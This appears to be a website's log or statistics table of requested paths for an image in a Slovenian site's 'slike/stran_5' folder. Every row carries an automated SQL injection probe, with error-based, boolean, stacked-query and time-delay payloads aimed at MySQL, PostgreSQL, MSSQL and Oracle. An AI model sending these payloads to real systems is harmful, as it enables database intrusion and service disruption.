1577. | 1 | prepovedano.gif //slike//stran_5' AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND 'lddI' LIKE 'lddI/prepovedano.gif |
1578. | 1 | (SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND ("tVEZ"="tVEZ&file=prepovedano.gif','','scrollbars=1,resizable=1');">prepovedano.gif //slike//stran_5") AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND ("tVEZ"="tVEZ/prepovedano.gif |
1579. | 1 | (SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND "vHcZ"="vHcZ&file=prepovedano.gif','','scrollbars=1,resizable=1');">prepovedano.gif //slike//stran_5" AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND "vHcZ"="vHcZ/prepovedano.gif |
1580. | 1 | prepovedano.gif //slike//stran_5) AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND (9262=9262/prepovedano.gif |
1581. | 1 | prepovedano.gif //slike//stran_5)) AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ((1770=1770/prepovedano.gif |
1582. | 1 | prepovedano.gif //slike//stran_5 AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)))/prepovedano.gif |
1583. | 1 | prepovedano.gif //slike//stran_5 AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)))-- tuOF/prepovedano.gif |
1584. | 1 | prepovedano.gif //slike//stran_5') AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ('PQVQ'='PQVQ/prepovedano.gif |
1585. | 1 | prepovedano.gif //slike//stran_5')) AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND (('ZygI'='ZygI/prepovedano.gif |
1586. | 1 | prepovedano.gif //slike//stran_5' AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'GNEc'='GNEc/prepovedano.gif |
1587. | 1 | prepovedano.gif //slike//stran_5') AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ('tQjt' LIKE 'tQjt/prepovedano.gif |
1588. | 1 | prepovedano.gif //slike//stran_5%' AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'TCZE%'='TCZE/prepovedano.gif |
1589. | 1 | prepovedano.gif //slike//stran_5' AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'irfk' LIKE 'irfk/prepovedano.gif |
1590. | 1 | prepovedano.gif //slike//stran_5") AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ("JWeP"="JWeP/prepovedano.gif |
1591. | 1 | prepovedano.gif //slike//stran_5" AND 4195 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4195=4195) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND "HAbO"="HAbO/prepovedano.gif |
1592. | 1 | prepovedano.gif //slike//stran_5) AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND (5541=5541/prepovedano.gif |
1593. | 1 | prepovedano.gif //slike//stran_5)) AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ((2407=2407/prepovedano.gif |
1594. | 1 | prepovedano.gif //slike//stran_5 AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)))/prepovedano.gif |
1595. | 1 | prepovedano.gif //slike//stran_5 AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)))-- eFFa/prepovedano.gif |
1596. | 1 | prepovedano.gif //slike//stran_5') AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ('rLzE'='rLzE/prepovedano.gif |
1597. | 1 | prepovedano.gif //slike//stran_5')) AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND (('jzRc'='jzRc/prepovedano.gif |
1598. | 1 | prepovedano.gif //slike//stran_5' AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'oFoi'='oFoi/prepovedano.gif |
1599. | 1 | prepovedano.gif //slike//stran_5') AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ('UkAS' LIKE 'UkAS/prepovedano.gif |
1600. | 1 | prepovedano.gif //slike//stran_5%' AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'OnRv%'='OnRv/prepovedano.gif |
1601. | 1 | prepovedano.gif //slike//stran_5' AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND 'HvdW' LIKE 'HvdW/prepovedano.gif |
1602. | 1 | prepovedano.gif //slike//stran_5") AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND ("QViX"="QViX/prepovedano.gif |
1603. | 1 | prepovedano.gif //slike//stran_5" AND 9600=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9600=9600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))) AND "BVEJ"="BVEJ/prepovedano.gif |
1604. | 1 | prepovedano.gif //slike//stran_5) AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND (4326=4326/prepovedano.gif |
1605. | 1 | prepovedano.gif //slike//stran_5)) AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND ((4171=4171/prepovedano.gif |
1606. | 1 | prepovedano.gif //slike//stran_5 AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))/prepovedano.gif |
1607. | 1 | prepovedano.gif //slike//stran_5 AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))-- PImT/prepovedano.gif |
1608. | 1 | prepovedano.gif //slike//stran_5') AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND ('PDoK'='PDoK/prepovedano.gif |
1609. | 1 | prepovedano.gif //slike//stran_5')) AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND (('KFFj'='KFFj/prepovedano.gif |
1610. | 1 | prepovedano.gif //slike//stran_5' AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND 'gWmT'='gWmT/prepovedano.gif |
1611. | 1 | prepovedano.gif //slike//stran_5') AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND ('VpFZ' LIKE 'VpFZ/prepovedano.gif |
1612. | 1 | prepovedano.gif //slike//stran_5%' AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND 'jyOc%'='jyOc/prepovedano.gif |
1613. | 1 | prepovedano.gif //slike//stran_5' AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND 'ZYWn' LIKE 'ZYWn/prepovedano.gif |
1614. | 1 | prepovedano.gif //slike//stran_5") AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND ("ZzLC"="ZzLC/prepovedano.gif |
1615. | 1 | prepovedano.gif //slike//stran_5" AND 4433=CONCAT(CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (4433=4433) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113)) AND "mOZr"="mOZr/prepovedano.gif |
1616. | 1 | prepovedano.gif //slike//stran_5) PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND (8395=8395/prepovedano.gif |
1617. | 1 | prepovedano.gif //slike//stran_5)) PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND ((3085=3085/prepovedano.gif |
1618. | 1 | prepovedano.gif //slike//stran_5 PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1)/prepovedano.gif |
1619. | 1 | prepovedano.gif //slike//stran_5 PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1)-- gbQs/prepovedano.gif |
1620. | 1 | prepovedano.gif //slike//stran_5') PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND ('BjAf'='BjAf/prepovedano.gif |
1621. | 1 | prepovedano.gif //slike//stran_5')) PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND (('ygBi'='ygBi/prepovedano.gif |
1622. | 1 | prepovedano.gif //slike//stran_5' PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND 'bXJi'='bXJi/prepovedano.gif |
1623. | 1 | prepovedano.gif //slike//stran_5') PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND ('QRbY' LIKE 'QRbY/prepovedano.gif |
1624. | 1 | prepovedano.gif //slike//stran_5%' PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND 'GOvl%'='GOvl/prepovedano.gif |
1625. | 1 | prepovedano.gif //slike//stran_5' PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND 'cvXW' LIKE 'cvXW/prepovedano.gif |
1626. | 1 | prepovedano.gif //slike//stran_5") PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND ("jLNr"="jLNr/prepovedano.gif |
1627. | 1 | prepovedano.gif //slike//stran_5" PROCEDURE ANALYSE(EXTRACTVALUE(1124,CONCAT(0x5c,0x71766a7671,(SELECT (CASE WHEN (1124=1124) THEN 1 ELSE 0 END)),0x71626b7071)),1) AND "tsSY"="tsSY/prepovedano.gif |
1628. | 1 | prepovedano.gif //slike//stran_(SELECT 8870 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(8870=8870,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)/prepovedano.gif |
1629. | 1 | prepovedano.gif //slike//stran_5,(SELECT 6301 FROM (SELECT ROW(6301,9169)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6301=6301,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 6945 UNION SELECT 6939 UNION SELECT 9783 UNION SELECT 4964)a GROUP BY x))s)/prepovedano.gif |
1630. | 1 | prepovedano.gif //slike//stran_5);DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1631. | 1 | prepovedano.gif //slike//stran_5));DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1632. | 1 | prepovedano.gif //slike//stran_5;DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1633. | 1 | prepovedano.gif //slike//stran_5');DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1634. | 1 | prepovedano.gif //slike//stran_5'));DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1635. | 1 | prepovedano.gif //slike//stran_5';DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1636. | 1 | prepovedano.gif //slike//stran_5%';DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1637. | 1 | prepovedano.gif //slike//stran_5");DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1638. | 1 | prepovedano.gif //slike//stran_5";DECLARE @yKtk NVARCHAR(4000);SET @yKtk=(SELECT 'qvjvq'+(SELECT (CASE WHEN (3536=3536) THEN '1' ELSE '0' END))+'qbkpq');EXEC @yKtk--/prepovedano.gif |
1639. | 1 | prepovedano.gif //slike//stran_(SELECT CONCAT(CONCAT('qvjvq',(CASE WHEN (7342=7342) THEN '1' ELSE '0' END)),'qbkpq'))/prepovedano.gif |
1640. | 1 | prepovedano.gif //slike//stran_(SELECT CONCAT(0x71766a7671,(ELT(9361=9361,1)),0x71626b7071))/prepovedano.gif |
1641. | 1 | prepovedano.gif //slike//stran_(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(CASE WHEN (9330=9330) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(112)+CHAR(113))/prepovedano.gif |
1642. | 1 | prepovedano.gif //slike//stran_5);SELECT SLEEP(32)#/prepovedano.gif |
1643. | 1 | prepovedano.gif //slike//stran_5));SELECT SLEEP(32)#/prepovedano.gif |
1644. | 1 | prepovedano.gif //slike//stran_5;SELECT SLEEP(32)#/prepovedano.gif |
1645. | 1 | prepovedano.gif //slike//stran_5');SELECT SLEEP(32)#/prepovedano.gif |
1646. | 1 | prepovedano.gif //slike//stran_5'));SELECT SLEEP(32)#/prepovedano.gif |
1647. | 1 | prepovedano.gif //slike//stran_5';SELECT SLEEP(32)#/prepovedano.gif |
1648. | 1 | prepovedano.gif //slike//stran_5%';SELECT SLEEP(32)#/prepovedano.gif |
1649. | 1 | prepovedano.gif //slike//stran_5");SELECT SLEEP(32)#/prepovedano.gif |
1650. | 1 | prepovedano.gif //slike//stran_5";SELECT SLEEP(32)#/prepovedano.gif |
1651. | 1 | prepovedano.gif //slike//stran_5);SELECT PG_SLEEP(32)--/prepovedano.gif |
1652. | 1 | prepovedano.gif //slike//stran_5));SELECT PG_SLEEP(32)--/prepovedano.gif |
1653. | 1 | prepovedano.gif //slike//stran_5;SELECT PG_SLEEP(32)--/prepovedano.gif |
1654. | 1 | prepovedano.gif //slike//stran_5');SELECT PG_SLEEP(32)--/prepovedano.gif |
1655. | 1 | prepovedano.gif //slike//stran_5'));SELECT PG_SLEEP(32)--/prepovedano.gif |
1656. | 1 | prepovedano.gif //slike//stran_5';SELECT PG_SLEEP(32)--/prepovedano.gif |
1657. | 1 | prepovedano.gif //slike//stran_5%';SELECT PG_SLEEP(32)--/prepovedano.gif |
1658. | 1 | prepovedano.gif //slike//stran_5");SELECT PG_SLEEP(32)--/prepovedano.gif |
1659. | 1 | prepovedano.gif //slike//stran_5";SELECT PG_SLEEP(32)--/prepovedano.gif |
1660. | 1 | prepovedano.gif //slike//stran_5);SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1661. | 1 | prepovedano.gif //slike//stran_5));SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1662. | 1 | prepovedano.gif //slike//stran_5;SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1663. | 1 | prepovedano.gif //slike//stran_5');SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1664. | 1 | prepovedano.gif //slike//stran_5'));SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1665. | 1 | prepovedano.gif //slike//stran_5';SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1666. | 1 | prepovedano.gif //slike//stran_5%';SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1667. | 1 | prepovedano.gif //slike//stran_5");SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1668. | 1 | prepovedano.gif //slike//stran_5";SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/prepovedano.gif |
1669. | 1 | prepovedano.gif //slike//stran_5);WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1670. | 1 | prepovedano.gif //slike//stran_5));WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1671. | 1 | prepovedano.gif //slike//stran_5;WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1672. | 1 | prepovedano.gif //slike//stran_5');WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1673. | 1 | prepovedano.gif //slike//stran_5'));WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1674. | 1 | prepovedano.gif //slike//stran_5';WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1675. | 1 | prepovedano.gif //slike//stran_5%';WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1676. | 1 | prepovedano.gif //slike//stran_5");WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1677. | 1 | prepovedano.gif //slike//stran_5";WAITFOR DELAY '0:0:32'--/prepovedano.gif |
1678. | 1 | prepovedano.gif //slike//stran_5);DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1679. | 1 | prepovedano.gif //slike//stran_5));DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1680. | 1 | prepovedano.gif //slike//stran_5;DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1681. | 1 | prepovedano.gif //slike//stran_5');DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1682. | 1 | prepovedano.gif //slike//stran_5'));DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1683. | 1 | prepovedano.gif //slike//stran_5';DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1684. | 1 | prepovedano.gif //slike//stran_5%';DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1685. | 1 | prepovedano.gif //slike//stran_5");DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1686. | 1 | prepovedano.gif //slike//stran_5";DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/prepovedano.gif |
1687. | 1 | prepovedano.gif //slike//stran_5);SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1688. | 1 | prepovedano.gif //slike//stran_5));SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1689. | 1 | prepovedano.gif //slike//stran_5;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1690. | 1 | prepovedano.gif //slike//stran_5');SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1691. | 1 | prepovedano.gif //slike//stran_5'));SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1692. | 1 | prepovedano.gif //slike//stran_5';SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1693. | 1 | prepovedano.gif //slike//stran_5%';SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1694. | 1 | prepovedano.gif //slike//stran_5");SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1695. | 1 | prepovedano.gif //slike//stran_5";SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5--/prepovedano.gif |
1696. | 1 | prepovedano.gif //slike//stran_5) ORDER BY 1-- eGot/prepovedano.gif |
1697. | 1 | prepovedano.gif //slike//stran_5) ORDER BY 8789-- vqrP/prepovedano.gif |
1698. | 1 | prepovedano.gif //slike//stran_5)) ORDER BY 1-- BByG/prepovedano.gif |
